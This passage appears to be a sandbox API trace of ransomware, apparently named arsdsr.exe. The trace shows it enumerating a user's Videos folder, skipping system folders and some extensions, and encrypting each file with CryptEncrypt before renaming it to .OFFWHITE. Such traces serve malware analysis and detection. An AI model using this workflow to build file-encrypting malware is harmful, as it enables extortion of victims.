HALPmcxz\\Videos\\ghq_bJyyoBo\\iK_2PblzI LnIeD7gD.flv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\iK_2PblzI LnIeD7gD.flv" [0136.083] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\iK_2PblzI LnIeD7gD.flv", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\iK_2PblzI LnIeD7gD.flv.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\iK_2PblzI LnIeD7gD.flv.OFFWHITE" [0136.083] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\iK_2PblzI LnIeD7gD.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\ik_2pblzi lnied7gd.flv"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\iK_2PblzI LnIeD7gD.flv.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\ik_2pblzi lnied7gd.flv.offwhite")) returned 1 [0136.084] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916b2cb0, ftCreationTime.dwHighDateTime=0x1d5df9c, ftLastAccessTime.dwLowDateTime=0x310d76b0, ftLastAccessTime.dwHighDateTime=0x1d5e691, ftLastWriteTime.dwLowDateTime=0x310d76b0, ftLastWriteTime.dwHighDateTime=0x1d5e691, nFileSizeHigh=0x0, nFileSizeLow=0x9a8f, dwReserved0=0x295debc, dwReserved1=0x48e59e2e, cFileName="Ir7-A8jPj19v9LpDYlkm.swf", cAlternateFileName="IR7-A8~1.SWF")) returned 1 [0136.084] lstrcmpiW (lpString1="Ir7-A8jPj19v9LpDYlkm.swf", lpString2=".") returned 1 [0136.084] lstrcmpiW (lpString1="Ir7-A8jPj19v9LpDYlkm.swf", lpString2="..") returned 1 [0136.084] lstrcmpiW (lpString1="Ir7-A8jPj19v9LpDYlkm.swf", lpString2="...") returned 1 [0136.084] lstrcmpiW (lpString1="Ir7-A8jPj19v9LpDYlkm.swf", lpString2="windows") returned -1 [0136.084] lstrcmpiW (lpString1="Ir7-A8jPj19v9LpDYlkm.swf", lpString2="$recycle.bin") returned 1 [0136.084] lstrcmpiW (lpString1="Ir7-A8jPj19v9LpDYlkm.swf", lpString2="rsa") returned -1 [0136.084] lstrcmpiW (lpString1="Ir7-A8jPj19v9LpDYlkm.swf", lpString2="ntuser.dat") returned -1 [0136.084] lstrcmpiW (lpString1="Ir7-A8jPj19v9LpDYlkm.swf", lpString2="programdata") returned -1 [0136.084] lstrcmpiW (lpString1="Ir7-A8jPj19v9LpDYlkm.swf", lpString2="appdata") returned 1 [0136.084] lstrcmpiW (lpString1="Ir7-A8jPj19v9LpDYlkm.swf", lpString2="program files") returned -1 [0136.084] lstrcmpiW (lpString1="Ir7-A8jPj19v9LpDYlkm.swf", lpString2="program files (x86)") returned -1 [0136.084] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" [0136.084] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\", lpString2="Ir7-A8jPj19v9LpDYlkm.swf" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\Ir7-A8jPj19v9LpDYlkm.swf") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\Ir7-A8jPj19v9LpDYlkm.swf" [0136.084] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.084] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.084] PathFindExtensionW (pszPath="Ir7-A8jPj19v9LpDYlkm.swf") returned=".swf" [0136.084] lstrcmpiW (lpString1=".swf", lpString2=".exe") returned 1 [0136.084] lstrcmpiW (lpString1=".swf", lpString2=".log") returned 1 [0136.084] lstrcmpiW (lpString1=".swf", lpString2=".cab") returned 1 [0136.084] lstrcmpiW (lpString1=".swf", lpString2=".cmd") returned 1 [0136.084] lstrcmpiW (lpString1=".swf", lpString2=".com") returned 1 [0136.085] lstrcmpiW (lpString1=".swf", lpString2=".cpl") returned 1 [0136.085] lstrcmpiW (lpString1=".swf", lpString2=".ini") returned 1 [0136.085] lstrcmpiW (lpString1=".swf", lpString2=".dll") returned 1 [0136.085] lstrcmpiW (lpString1=".swf", lpString2=".url") returned -1 [0136.085] lstrcmpiW (lpString1=".swf", lpString2=".ttf") returned -1 [0136.085] lstrcmpiW (lpString1=".swf", lpString2=".mp3") returned 1 [0136.085] lstrcmpiW (lpString1=".swf", lpString2=".pif") returned 1 [0136.085] lstrcmpiW (lpString1=".swf", lpString2=".mp4") returned 1 [0136.085] lstrcmpiW (lpString1=".swf", lpString2=".OFFWHITE") returned 1 [0136.085] lstrcmpiW (lpString1=".swf", lpString2=".msi") returned 1 [0136.085] lstrcmpiW (lpString1="Ir7-A8jPj19v9LpDYlkm.swf", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0136.085] GetProcessHeap () returned 0x500000 [0136.085] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522060 [0136.085] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\Ir7-A8jPj19v9LpDYlkm.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\ir7-a8jpj19v9lpdylkm.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0136.085] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=39567) returned 1 [0136.085] GetProcessHeap () returned 0x500000 [0136.085] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0136.085] GetProcessHeap () returned 0x500000 [0136.086] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0136.086] GetProcessHeap () returned 0x500000 [0136.086] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0136.086] GetProcessHeap () returned 0x500000 [0136.086] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0136.086] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.086] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.086] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0136.086] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.086] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.086] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0136.086] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.086] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.086] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295dc90*=0x100) returned 1 [0136.086] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.086] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.086] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0136.087] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x9a8f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.087] SetLastError (dwErrCode=0x0) [0136.087] WriteFile (in: hFile=0x21c, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.090] GetLastError () returned 0x0 [0136.090] GetLastError () returned 0x0 [0136.090] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x9b8f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.090] WriteFile (in: hFile=0x21c, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.090] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x9c8f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.091] WriteFile (in: hFile=0x21c, lpBuffer=0x522060*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x522060*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0136.091] GetProcessHeap () returned 0x500000 [0136.091] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x9a8f) returned 0x55a7b8 [0136.091] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.091] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x9a8f, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x9a8f, lpOverlapped=0x0) returned 1 [0136.094] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.094] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x9a8f, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x9a8f, lpOverlapped=0x0) returned 1 [0136.094] GetProcessHeap () returned 0x500000 [0136.094] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0136.094] CloseHandle (hObject=0x21c) returned 1 [0136.098] GetProcessHeap () returned 0x500000 [0136.099] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0136.099] GetProcessHeap () returned 0x500000 [0136.099] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0136.099] GetProcessHeap () returned 0x500000 [0136.099] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0136.099] GetProcessHeap () returned 0x500000 [0136.099] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0136.099] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\Ir7-A8jPj19v9LpDYlkm.swf" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\Ir7-A8jPj19v9LpDYlkm.swf") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\Ir7-A8jPj19v9LpDYlkm.swf" [0136.099] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\Ir7-A8jPj19v9LpDYlkm.swf", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\Ir7-A8jPj19v9LpDYlkm.swf.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\Ir7-A8jPj19v9LpDYlkm.swf.OFFWHITE" [0136.099] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\Ir7-A8jPj19v9LpDYlkm.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\ir7-a8jpj19v9lpdylkm.swf"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\Ir7-A8jPj19v9LpDYlkm.swf.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\ir7-a8jpj19v9lpdylkm.swf.offwhite")) returned 1 [0136.100] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5443c480, ftCreationTime.dwHighDateTime=0x1d5e458, ftLastAccessTime.dwLowDateTime=0x58aa120, ftLastAccessTime.dwHighDateTime=0x1d5e66e, ftLastWriteTime.dwLowDateTime=0x58aa120, ftLastWriteTime.dwHighDateTime=0x1d5e66e, nFileSizeHigh=0x0, nFileSizeLow=0x76ba, dwReserved0=0x295debc, dwReserved1=0x48e59e2e, cFileName="It-VEdB.flv", cAlternateFileName="")) returned 1 [0136.100] lstrcmpiW (lpString1="It-VEdB.flv", lpString2=".") returned 1 [0136.100] lstrcmpiW (lpString1="It-VEdB.flv", lpString2="..") returned 1 [0136.100] lstrcmpiW (lpString1="It-VEdB.flv", lpString2="...") returned 1 [0136.100] lstrcmpiW (lpString1="It-VEdB.flv", lpString2="windows") returned -1 [0136.100] lstrcmpiW (lpString1="It-VEdB.flv", lpString2="$recycle.bin") returned 1 [0136.100] lstrcmpiW (lpString1="It-VEdB.flv", lpString2="rsa") returned -1 [0136.100] lstrcmpiW (lpString1="It-VEdB.flv", lpString2="ntuser.dat") returned -1 [0136.100] lstrcmpiW (lpString1="It-VEdB.flv", lpString2="programdata") returned -1 [0136.100] lstrcmpiW (lpString1="It-VEdB.flv", lpString2="appdata") returned 1 [0136.100] lstrcmpiW (lpString1="It-VEdB.flv", lpString2="program files") returned -1 [0136.100] lstrcmpiW (lpString1="It-VEdB.flv", lpString2="program files (x86)") returned -1 [0136.100] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" [0136.100] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\", lpString2="It-VEdB.flv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\It-VEdB.flv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\It-VEdB.flv" [0136.100] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.100] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.100] PathFindExtensionW (pszPath="It-VEdB.flv") returned=".flv" [0136.100] lstrcmpiW (lpString1=".flv", lpString2=".exe") returned 1 [0136.100] lstrcmpiW (lpString1=".flv", lpString2=".log") returned -1 [0136.100] lstrcmpiW (lpString1=".flv", lpString2=".cab") returned 1 [0136.100] lstrcmpiW (lpString1=".flv", lpString2=".cmd") returned 1 [0136.101] lstrcmpiW (lpString1=".flv", lpString2=".com") returned 1 [0136.101] lstrcmpiW (lpString1=".flv", lpString2=".cpl") returned 1 [0136.101] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0136.101] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0136.101] lstrcmpiW (lpString1=".flv", lpString2=".url") returned -1 [0136.101] lstrcmpiW (lpString1=".flv", lpString2=".ttf") returned -1 [0136.101] lstrcmpiW (lpString1=".flv", lpString2=".mp3") returned -1 [0136.101] lstrcmpiW (lpString1=".flv", lpString2=".pif") returned -1 [0136.101] lstrcmpiW (lpString1=".flv", lpString2=".mp4") returned -1 [0136.101] lstrcmpiW (lpString1=".flv", lpString2=".OFFWHITE") returned -1 [0136.101] lstrcmpiW (lpString1=".flv", lpString2=".msi") returned -1 [0136.101] lstrcmpiW (lpString1="It-VEdB.flv", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0136.101] GetProcessHeap () returned 0x500000 [0136.101] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x522070 [0136.101] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\It-VEdB.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\it-vedb.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0136.101] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=30394) returned 1 [0136.101] GetProcessHeap () returned 0x500000 [0136.102] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5315a8 [0136.102] GetProcessHeap () returned 0x500000 [0136.102] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531578 [0136.102] GetProcessHeap () returned 0x500000 [0136.102] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525228 [0136.102] GetProcessHeap () returned 0x500000 [0136.102] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525120 [0136.102] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.103] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.103] SystemFunction036 (in: RandomBuffer=0x5315a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5315a8) returned 1 [0136.103] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.103] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.103] SystemFunction036 (in: RandomBuffer=0x531578, RandomBufferLength=0x10 | out: RandomBuffer=0x531578) returned 1 [0136.103] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.103] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.103] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525228*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x525228*, pdwDataLen=0x295dc90*=0x100) returned 1 [0136.103] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.103] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.103] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525120*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x525120*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0136.103] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x76ba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.104] SetLastError (dwErrCode=0x0) [0136.104] WriteFile (in: hFile=0x21c, lpBuffer=0x525228*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525228*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.108] GetLastError () returned 0x0 [0136.108] GetLastError () returned 0x0 [0136.108] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x77ba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.108] WriteFile (in: hFile=0x21c, lpBuffer=0x525120*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x525120*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0136.108] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x78ba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.108] WriteFile (in: hFile=0x21c, lpBuffer=0x522070*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x522070*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0136.108] GetProcessHeap () returned 0x500000 [0136.108] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x76ba) returned 0x55a7b8 [0136.108] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.108] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x76ba, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x76ba, lpOverlapped=0x0) returned 1 [0136.111] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.111] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x76ba, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x76ba, lpOverlapped=0x0) returned 1 [0136.111] GetProcessHeap () returned 0x500000 [0136.111] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0136.111] CloseHandle (hObject=0x21c) returned 1 [0136.112] GetProcessHeap () returned 0x500000 [0136.112] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525228 | out: hHeap=0x500000) returned 1 [0136.113] GetProcessHeap () returned 0x500000 [0136.113] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525120 | out: hHeap=0x500000) returned 1 [0136.113] GetProcessHeap () returned 0x500000 [0136.113] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5315a8 | out: hHeap=0x500000) returned 1 [0136.113] GetProcessHeap () returned 0x500000 [0136.113] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531578 | out: hHeap=0x500000) returned 1 [0136.113] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\It-VEdB.flv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\It-VEdB.flv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\It-VEdB.flv" [0136.113] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\It-VEdB.flv", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\It-VEdB.flv.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\It-VEdB.flv.OFFWHITE" [0136.113] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\It-VEdB.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\it-vedb.flv"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\It-VEdB.flv.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghq_bjyyobo\\it-vedb.flv.offwhite")) returned 1 [0136.114] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7db2ae0, ftCreationTime.dwHighDateTime=0x1d5e478, ftLastAccessTime.dwLowDateTime=0xe5514790, ftLastAccessTime.dwHighDateTime=0x1d5d7fb, ftLastWriteTime.dwLowDateTime=0xe5514790, ftLastWriteTime.dwHighDateTime=0x1d5d7fb, nFileSizeHigh=0x0, nFileSizeLow=0x4ae9, dwReserved0=0x295debc, dwReserved1=0x48e59e2e, cFileName="KqOQsT0eQZ0rM.swf", cAlternateFileName="KQOQST~1.SWF")) returned 1 [0136.114] lstrcmpiW (lpString1="KqOQsT0eQZ0rM.swf", lpString2=".") returned 1 [0136.114] lstrcmpiW (lpString1="KqOQsT0eQZ0rM.swf", lpString2="..") returned 1 [0136.114] lstrcmpiW (lpString1="KqOQsT0eQZ0rM.swf", lpString2="...") returned 1 [0136.114] lstrcmpiW (lpString1="KqOQsT0eQZ0rM.swf", lpString2="windows") returned -1 [0136.114] lstrcmpiW (lpString1="KqOQsT0eQZ0rM.swf", lpString2="$recycle.bin") returned 1 [0136.114] lstrcmpiW (lpString1="KqOQsT0eQZ0rM.swf", lpString2="rsa") returned -1 [0136.114] lstrcmpiW (lpString1="KqOQsT0eQZ0rM.swf", lpString2="ntuser.dat") returned -1 [0136.114] lstrcmpiW (lpString1="KqOQsT0eQZ0rM.swf", lpString2="programdata") returned -1 [0136.114] lstrcmpiW (lpString1="KqOQsT0eQZ0rM.swf", lpString2="appdata") returned 1 [0136.114] lstrcmpiW (lpString1="KqOQsT0eQZ0rM.swf", lpString2="program files") returned -1 [0136.114] lstrcmpiW (lpString1="KqOQsT0eQZ0rM.swf", lpString2="program files (x86)") returned -1 [0136.114] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\" [0136.114] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\", lpString2="KqOQsT0eQZ0rM.swf" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\KqOQsT0eQZ0rM.swf") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ghq_bJyyoBo\\KqOQsT0eQZ0rM.swf" [0136.114] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0136.114] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0136.114] PathFindExtensionW (pszPath="KqOQsT0eQZ0rM.swf") returned=".swf" [0136.114] lstrcmpiW (lpString1=".swf", lpString2=".exe") returned 1 [0136.114] lstrcmpiW (lpString1=".swf", lpString2=".log") returned 1 [0136.115] lstrcmpiW (lpString1=".swf", lpString2=".cab") returned 1 [0136.115] lstrcmpiW (lpString1=".swf", lpString2=".cmd") returned 1 [0136.115] lstrcmpiW (lpString1=".swf", lpString2=".com") returned 1 [0136.115] lstrcmpiW (lpString1=".swf", lpString2=".cpl") returned 1 [0136.115] lstrcmpiW (lpString1=".swf", lpString2=".ini") returned 1 [0136.115] lstrcmpiW (lpString1=".swf", lpString2=".dll") returned 1 [0136.115] lstrcmpiW (lpString1=".swf", lpString2=".url") returned -1 [0136.115] lstrcmpiW (lpString1=".swf", lpString2=".ttf") returned -1 [0136.115] lstrcmpiW (lpString1=".swf", lpString2=".mp3") returned 1 [0136.115] lstrcmpiW (lpString1=".swf", lpString2=".pif") returned 1 [0136.115] lstrcmpiW (lpString1=".swf", lpString2=".mp4") returned 1 [0136.115] lstrcmpiW (lpString1=".swf", lpString2=".OFFWHITE") returned 1 [0136.115] lstrcmpiW (lpString1=".swf", lpString2=".msi") returned 1 [0136.115] lstrcmpiW 